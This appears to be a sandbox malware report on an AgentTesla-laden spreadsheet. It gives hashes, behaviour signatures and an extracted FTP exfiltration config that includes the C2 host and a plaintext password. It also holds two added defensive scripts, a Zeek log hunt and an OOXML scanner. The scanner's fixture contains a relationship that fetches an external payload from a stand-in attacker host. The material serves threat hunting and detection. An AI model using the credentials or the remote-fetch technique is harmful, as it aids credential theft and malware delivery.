General

Target: Package.xls
Size: 391KB
Sample: 231207-y52vsafd34
MD5: 3e33c8cf5b3ce2fa86f1b0ab22d2d3c2
SHA1: de4c28fc5c4eab8c71b09830ff295b901be6a844
SHA256: 7712b3d4b61189ccbafdbcc285b7a761d517bb68295626e30c33c24c38fb95cd
SHA512: 0ef6016a7e6d0a45d9358ee21ddacea1b0aa393f276dadc32f3218c89f41fbea9ac765b5127c60cc8c069eb26ee52ffb740d0a7eb2af6ccf20a68e7740852354
SSDEEP: 6144:ln1m9kdbQS6vsB3qfLWnNnBkbE9UX3yhnpC3quvmb6SrnV3LYpMMAI:lOeuvsB351Bkr3yh9b9hr
Static task: static1

Behavioral task: behavioral1
Sample: Package.xls
Resource: win7-20231023-en

Behavioral task: behavioral2
Sample: Package.xls
Resource: win10-20231025-en

Behavioral task: behavioral3
Sample: Package.xls
Resource: win10v2004-20231201-en
Malware Config

Extracted family: agenttesla
Protocol: ftp
Host: ftp://ftp.experthvac.ro
Port: 21
Username: [email protected]
Password: -8{jszMOY*Z8(~Za0#jyP%o7VoB.0)kk^)7_
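The extracted configuration gives the exfiltration channel (FTP to ftp.experthvac.ro on port 21). The following is an added hunting example, not part of the Triage report: it resolves the C2 hostname through constructed Zeek-style dns.log records and then matches constructed conn.log records against the resolved addresses, the configured port and the FTP service label. Every IP address, internal host and the second hostname are invented for illustration; only the C2 host, port and protocol come from the config above. The FTP username is not preserved on this page and the password is deliberately not used as an indicator.

```python
"""Hunt for the FTP exfiltration channel from the extracted AgentTesla config.

Added example; not code from the Triage report or the sandbox. The dns.log and
conn.log lines are constructed to resemble Zeek output, with made-up addresses.
"""

# Indicators taken from the report's "Malware Config" section.
C2_HOST = "ftp.experthvac.ro"
C2_PORT = 21
C2_PROTOCOL = "ftp"

# Constructed Zeek dns.log excerpt (tab separated, comment lines dropped).
DNS_FIELDS = ["ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p", "proto", "query", "answers"]
DNS_LOG = """\
1701990001.10\tCd1\t10.0.0.5\t53211\t10.0.0.2\t53\tudp\tftp.experthvac.ro\t203.0.113.10
1701990002.20\tCd2\t10.0.0.5\t53212\t10.0.0.2\t53\tudp\tupdate.example.net\t198.51.100.7
1701990002.90\tCd3\t10.0.0.9\t53213\t10.0.0.2\t53\tudp\tftp.experthvac.ro\t203.0.113.10,203.0.113.11
"""

# Constructed Zeek conn.log excerpt. Cc3 is FTP on a non-standard port and Cc4
# is port 21 without a recognised service, both of which must still be caught.
CONN_FIELDS = ["ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p", "proto", "service"]
CONN_LOG = """\
1701990003.30\tCc1\t10.0.0.5\t49712\t203.0.113.10\t21\ttcp\tftp
1701990004.40\tCc2\t10.0.0.5\t49713\t198.51.100.7\t443\ttcp\tssl
1701990005.50\tCc3\t10.0.0.9\t49714\t203.0.113.11\t2121\ttcp\tftp
1701990006.60\tCc4\t10.0.0.7\t49715\t203.0.113.10\t21\ttcp\t-
"""


def parse_tsv(text, fields):
    """Parse tab-separated log lines into dicts keyed by the given field names."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(parts)}: {line!r}")
        records.append(dict(zip(fields, parts)))
    return records


def resolved_addresses(dns_records, host):
    """Collect every answer returned for lookups of the C2 hostname."""
    addrs = set()
    for rec in dns_records:
        if rec["query"].lower() == host.lower() and rec["answers"] != "-":
            addrs.update(a for a in rec["answers"].split(",") if a)
    return addrs


def find_exfil_connections(conn_records, c2_addrs):
    """Return connections to a C2 address that match the configured port or the FTP service."""
    hits = []
    for rec in conn_records:
        if rec["resp_h"] not in c2_addrs:
            continue
        on_port = int(rec["resp_p"]) == C2_PORT
        ftp_seen = rec["service"] == C2_PROTOCOL
        if on_port and ftp_seen:
            reason = "ftp to C2 on configured port"
        elif ftp_seen:
            reason = "ftp to C2 on non-standard port"
        elif on_port:
            reason = "connection to C2 on port 21, service not identified"
        else:
            continue  # C2 address, but neither the port nor the protocol matched
        hits.append({"uid": rec["uid"], "orig_h": rec["orig_h"],
                     "resp_h": rec["resp_h"], "resp_p": rec["resp_p"], "reason": reason})
    return hits


def hunt(dns_log=DNS_LOG, conn_log=CONN_LOG):
    """Resolve the C2 host from DNS records, then flag matching connections."""
    dns = parse_tsv(dns_log, DNS_FIELDS)
    conns = parse_tsv(conn_log, CONN_FIELDS)
    return find_exfil_connections(conns, resolved_addresses(dns, C2_HOST))


if __name__ == "__main__":
    for hit in hunt():
        print(f"{hit['uid']}: {hit['orig_h']} -> {hit['resp_h']}:{hit['resp_p']} ({hit['reason']})")
```

Resolving the hostname from the DNS log rather than hard-coding an address matters because the sandbox only recorded the name; pivoting on the address set also catches hosts that reach the server without a logged lookup, and keying on the FTP service label catches a port change.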
Targets

Target: Package.xls (391KB; MD5, SHA1, SHA256, SHA512 and SSDEEP as listed under General)
AgentTesla
Agent Tesla is a remote access tool (RAT) and credential stealer built on .NET (originally written in Visual Basic .NET); it harvests saved credentials, keystrokes and clipboard data and exfiltrates them over SMTP, FTP or HTTP, which is what the FTP account in the extracted configuration above is for.

- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
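The "Abuses OpenXML format to download file from external location" signature fires on a relationship in the document package whose TargetMode is External and whose target is a remote URL. The scanner below is an added example, not part of the Triage report or the sandbox's own detection logic. It builds two minimal OOXML-style packages in memory (one with an oleObject relationship pointing at a constructed URL, one with only a hyperlink) and checks every .rels part; the URLs, package parts and relationship IDs are constructed for illustration.

```python
"""Flag OOXML packages whose relationships pull a part from an external location.

Added example; not code from the Triage report or the sandbox. The packages are
constructed in memory with only the parts the scanner needs.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed workbook relationships: rId2 fetches an OLE object from a remote
# server, which is the pattern behind the "download file from external location" signature.
MALICIOUS_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/oleObject" Target="http://attacker.invalid/payload.exe" TargetMode="External"/>
</Relationships>'''

# Constructed benign relationships: an external hyperlink is normal and only informational.
BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>'''


def build_package(rels_xml):
    """Construct a minimal OOXML-style zip containing the given workbook .rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
        z.writestr("xl/_rels/workbook.xml.rels", rels_xml)
    return buf.getvalue()


def scan_external_relationships(package, max_part_size=1_000_000):
    """Return one finding per external relationship in any .rels part of the package.

    Hyperlinks are reported as "info"; any other relationship type with an
    external target (oleObject, attachedTemplate, frame, ...) is "high" because
    the application will fetch that part from the remote location when the
    document is opened.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for info in z.infolist():
            if not info.filename.lower().endswith(".rels"):
                continue
            if info.file_size > max_part_size:  # refuse to parse an absurdly large .rels part
                findings.append({"part": info.filename, "id": "", "type": "oversized-rels",
                                 "target": "", "severity": "high"})
                continue
            root = ET.fromstring(z.read(info))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "")
                findings.append({
                    "part": info.filename,
                    "id": rel.get("Id", ""),
                    "type": rtype,
                    "target": rel.get("Target", ""),
                    "severity": "info" if rtype.endswith("/hyperlink") else "high",
                })
    return findings


def high_risk(package):
    """Only the findings that would justify blocking or detonating the document."""
    return [f for f in scan_external_relationships(package) if f["severity"] == "high"]


if __name__ == "__main__":
    for name, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        for f in scan_external_relationships(build_package(rels)):
            print(f"{name}: {f['severity']} {f['part']} {f['id']} -> {f['target']}")
```

The check is deliberately broad: it does not depend on the file extension, only on the package contents, so it applies equally to a document delivered under a misleading name. The xml.etree parser does not resolve external entities, so parsing the .rels parts themselves cannot trigger a fetch.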